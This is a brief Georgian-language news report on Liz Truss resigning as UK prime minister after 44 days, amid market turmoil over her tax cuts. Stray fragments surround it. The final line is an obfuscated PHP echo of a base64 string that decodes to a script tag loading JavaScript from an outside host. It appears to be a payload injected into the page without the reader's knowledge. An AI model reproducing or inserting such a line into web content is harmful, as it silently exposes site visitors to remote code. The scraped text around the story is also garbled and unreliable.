celsiusi
ავერსი საქკაბელი
ბრიტანეთის პრემიერ-მინისტრმა ლიზ ტრასმა 44-დღიანი მმართველობის შემდეგ, თანამდებობა დატოვა. ინფორმაციას „ბიბისი“ ავრცელებს.
 
როგორც მედია წერს, პოლიტიკური კრიზისი ბრიტანეთში უკვე რამდენიმე კვირაა, გრძელდება.
 
ოპონენტები ლიზ ტრასს ეკონომიკური კრიზისის გამწვავებაში ადანაშაულებდნენ. მედიის ცნობით, ტრასის მიერ შეთავაზებულმა ცვლილებებმა, გადასახადების შემცირებამ, ბრიტანეთის ეკონომიკურ ბირჟებზე აურზაური გამოიწვია, დაეცა გირვანქა სტერლინგის ღირებულება. როგორც მედია წერს, შექმნილი პრობლემების გამო, ტრასმა საჯაროდ აღიარა დაშვებული შეცდომები და პრობლემების მოსაგვარებლად ფინანსთა მინისტრი შეცვალა.
358
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");